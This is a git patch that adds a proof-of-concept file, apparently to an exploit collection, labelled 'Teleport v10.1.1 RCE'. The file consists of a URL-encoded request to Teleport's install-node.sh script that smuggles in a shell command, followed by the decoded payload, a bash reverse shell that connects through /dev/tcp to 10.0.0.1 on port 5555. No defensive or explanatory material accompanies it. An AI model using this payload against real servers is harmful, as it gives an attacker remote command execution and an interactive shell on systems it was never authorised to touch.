From 84bf02c8c7aaf647557bd86c44bda752ac9a27c8 Mon Sep 17 00:00:00 2001 From: helloexp <21156949+helloexp@users.noreply.github.com> Date: Mon, 20 Mar 2023 09:58:53 +0800 Subject: [PATCH] add Teleport v10.1.1 RCE --- 100-各种CMS/Teleport/Teleport v10.1.1 RCE/poc.sh | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 100-各种CMS/Teleport/Teleport v10.1.1 RCE/poc.sh diff --git a/100-各种CMS/Teleport/Teleport v10.1.1 RCE/poc.sh b/100-各种CMS/Teleport/Teleport v10.1.1 RCE/poc.sh new file mode 100644 index 0000000..0a7956f --- /dev/null +++ b/100-各种CMS/Teleport/Teleport v10.1.1 RCE/poc.sh @@ -0,0 +1,10 @@ +``` +https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2= +f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3= +0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?= +method=3Diam +``` + +接码后的payload + +/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 # \ No newline at end of file